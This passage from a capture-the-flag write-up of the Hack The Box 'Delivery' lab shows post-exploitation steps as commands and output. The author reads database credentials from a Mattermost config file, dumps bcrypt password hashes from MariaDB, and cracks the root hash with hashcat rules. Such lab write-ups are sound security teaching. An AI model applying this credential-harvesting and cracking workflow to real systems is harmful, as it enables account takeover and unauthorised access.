Mattermost
After conducting some basic enumeration, I decided to check for the installation directory of the Mattermost instance
maildeliverer@delivery:/opt/mattermost$ ll
total 288K
4.0k drwxr--r-- 5 mattermost mattermost 4.0k mar 27 11:08 plugins
4.0k drwxrwxr-x 3 mattermost mattermost 4.0k mar 27 10:54 data
4.0K drwxrwxr-x 12 mattermost mattermost 4.0K Jul 14 2021 .
4.0K drwxr-xr-x 3 root root 4.0K Jul 14 2021 ..
4.0K drwxrwxr-x 7 mattermost mattermost 4.0K Dec 26 2020 client
4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 26 2020 logs
4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 26 2020 config
4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 18 2020 prepackaged_plugins
4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 18 2020 bin
4.0K -rw-rw-r-- 1 mattermost mattermost 2.1K Dec 18 2020 ENTERPRISE-EDITION-LICENSE.txt
4.0K -rw-rw-r-- 1 mattermost mattermost 898 Dec 18 2020 manifest.txt
224K -rw-rw-r-- 1 mattermost mattermost 224K Dec 18 2020 NOTICE.txt
8.0K -rw-rw-r-- 1 mattermost mattermost 6.2K Dec 18 2020 README.md
4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 18 2020 fonts
4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 18 2020 i18n
4.0K drwxrwxr-x 2 mattermost mattermost 4.0K Dec 18 2020 templatesThe application is installed to the /opt/mattermost directory
maildeliverer@delivery:/opt/mattermost/config$ cat config.json
[...REDACTED...]
"sqlsettings": {
"drivername": "mysql",
"datasource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
"datasourcereplicas": [],
"datasourcesearchreplicas": [],
"maxidleconns": 20,
"connmaxlifetimemilliseconds": 3600000,
"maxopenconns": 300,
"trace": false,
"atrestencryptkey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
"querytimeout": 30,
"disabledatabasesearch": false
}
[...REDACTED...]there is a db connection string at the config/config.json file and it contains a db credential; mmuser:Crack_The_MM_Admin_PW
The password is very suggestive as it would go, “Crack The Mattermost Admin’s Password”
DB
maildeliverer@Delivery:/opt/mattermost/config$ mysql -ummuser -pCrack_The_MM_Admin_PW
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 263
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> Using the DB credential, I was able to authenticate to the mysqld service
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mattermost |
+--------------------+
2 rows in set (0.000 sec)
MariaDB [(none)]> use mattermost;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changedThe DB is mattermost
Table
MariaDB [mattermost]> SELECT Username,Password,Roles FROM Users;
+----------------------------------+--------------------------------------------------------------+--------------------------+
| Username | Password | Roles |
+----------------------------------+--------------------------------------------------------------+--------------------------+
| test2 | $2a$10$IfPTFaRLz1wRVqeiizSQtOWuIQ49K08Dp6nVEPR3olAvrJbCrB9BG | system_user |
| tester | $2a$10$GN/JuAq4gj2kXC2v0hYAGeEcraFXjG6QxHSa3E/MtY79t7K37kYfK | system_user |
| surveybot | | system_user |
| c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK | system_user |
| 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G | system_user |
| root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | system_admin system_user |
| ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq | system_user |
| channelexport | | system_user |
| 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm | system_user |
| test | $2a$10$fyPkviKdm4yHIrnUV8mO9.n8YsFOZGqbHdERKXXtCigC3ayFitV4e | system_user |
+----------------------------------+--------------------------------------------------------------+--------------------------+
10 rows in set (0.001 sec)Checking the mattermost.Users table reveals all the users including the root user who had the system_admin role
I will grab the credential of the root user and get cracking
Password Cracking
I remember that the 2nd message from the root user in the Internal chat earlier.
It mentions a password (PleaseSubscribe!) and it being easily crack-able with the hashcat rules
That explains the very suggestive password of the DB credential. It appears that I am supposed to use the rules in hashcat to crack the password hash
┌──(kali㉿kali)-[~/archive/htb/labs/delivery]
└─$ ll /usr/share/hashcat/rules/ total 2.9M
4.0K drwxr-xr-x 3 root root 4.0K Oct 11 13:58 .
12K drwxr-xr-x 2 root root 12K Oct 11 13:58 hybrid
4.0K drwxr-xr-x 9 root root 4.0K Oct 11 13:58 ..
4.0K -rw-r--r-- 1 root root 933 Oct 6 11:50 best64.rule
4.0K -rw-r--r-- 1 root root 754 Oct 6 11:50 combinator.rule
200K -rw-r--r-- 1 root root 197K Oct 6 11:50 d3ad0ne.rule
772K -rw-r--r-- 1 root root 770K Oct 6 11:50 dive.rule
476K -rw-r--r-- 1 root root 473K Oct 6 11:50 generated2.rule
80K -rw-r--r-- 1 root root 77K Oct 6 11:50 generated.rule
304K -rw-r--r-- 1 root root 303K Oct 6 11:50 Incisive-leetspeak.rule
36K -rw-r--r-- 1 root root 35K Oct 6 11:50 InsidePro-HashManager.rule
24K -rw-r--r-- 1 root root 21K Oct 6 11:50 InsidePro-PasswordsPro.rule
4.0K -rw-r--r-- 1 root root 298 Oct 6 11:50 leetspeak.rule
4.0K -rw-r--r-- 1 root root 1.3K Oct 6 11:50 oscommerce.rule
296K -rw-r--r-- 1 root root 295K Oct 6 11:50 rockyou-30000.rule
4.0K -rw-r--r-- 1 root root 1.6K Oct 6 11:50 specific.rule
4.0K -rw-r--r-- 1 root root 1.3K Oct 6 11:50 T0XlC_3_rule.rule
64K -rw-r--r-- 1 root root 63K Oct 6 11:50 T0XlC-insert_00-99_1950-2050_toprules_0_F.rule
168K -rw-r--r-- 1 root root 165K Oct 6 11:50 T0XlC_insert_HTML_entities_0_Z.rule
4.0K -rw-r--r-- 1 root root 2.0K Oct 6 11:50 T0XlC-insert_space_and_special_0_F.rule
36K -rw-r--r-- 1 root root 34K Oct 6 11:50 T0XlC-insert_top_100_passwords_1_G.rule
36K -rw-r--r-- 1 root root 34K Oct 6 11:50 T0XlC.rule
196K -rw-r--r-- 1 root root 193K Oct 6 11:50 T0XlCv2.rule
4.0K -rw-r--r-- 1 root root 45 Oct 6 11:50 toggles1.rule
4.0K -rw-r--r-- 1 root root 570 Oct 6 11:50 toggles2.rule
4.0K -rw-r--r-- 1 root root 3.7K Oct 6 11:50 toggles3.rule
16K -rw-r--r-- 1 root root 16K Oct 6 11:50 toggles4.rule
48K -rw-r--r-- 1 root root 48K Oct 6 11:50 toggles5.rule
56K -rw-r--r-- 1 root root 55K Oct 6 11:50 unix-ninja-leetspeak.ruleBy default, hashcat stores rules at the /usr/share/hashcat/rules/ directory, and it comes with a handful of rules
Rules can also be customized
┌──(kali㉿kali)-[~/archive/htb/labs/delivery]
└─$ cat passwd
PleaseSubscribe!First, I would need to create a file with its content being the potential password pointed by the root user
This will be used as the base word that the applied rule will generate words from.
┌──(kali㉿kali)-[~/archive/htb/labs/delivery]
└─$ hashcat -a 0 -m 3200 root.hash passwd -r /usr/share/hashcat/rules/best64.rule
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77
Dictionary cache hit:
* Filename..: passwd
* Passwords.: 1
* Bytes.....: 17
* Keyspace..: 77
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v...JwgjjO
Time.Started.....: Tue Mar 28 03:16:15 2023 (1 sec)
Time.Estimated...: Tue Mar 28 03:16:16 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (passwd)
Guess.Mod........: Rules (/usr/share/hashcat/rules/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 20 H/s (1.37ms) @ Accel:3 Loops:32 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 21/77 (27.27%)
Rejected.........: 0/21 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:20-21 Iteration:992-1024
Candidate.Engine.: Device Generator
Candidates.#1....: PleaseSubscribe!21 -> PleaseSubscribe!21
Hardware.Mon.#1..: Util: 29%
Started: Tue Mar 28 03:16:10 2023
Stopped: Tue Mar 28 03:16:18 2023By using the -r flag, I can apply the rule of choice. I went with what appears the most generic
Just like that, it’s cracked; PleaseSubscribe!21
Now that the password hash is cracked, I should test it out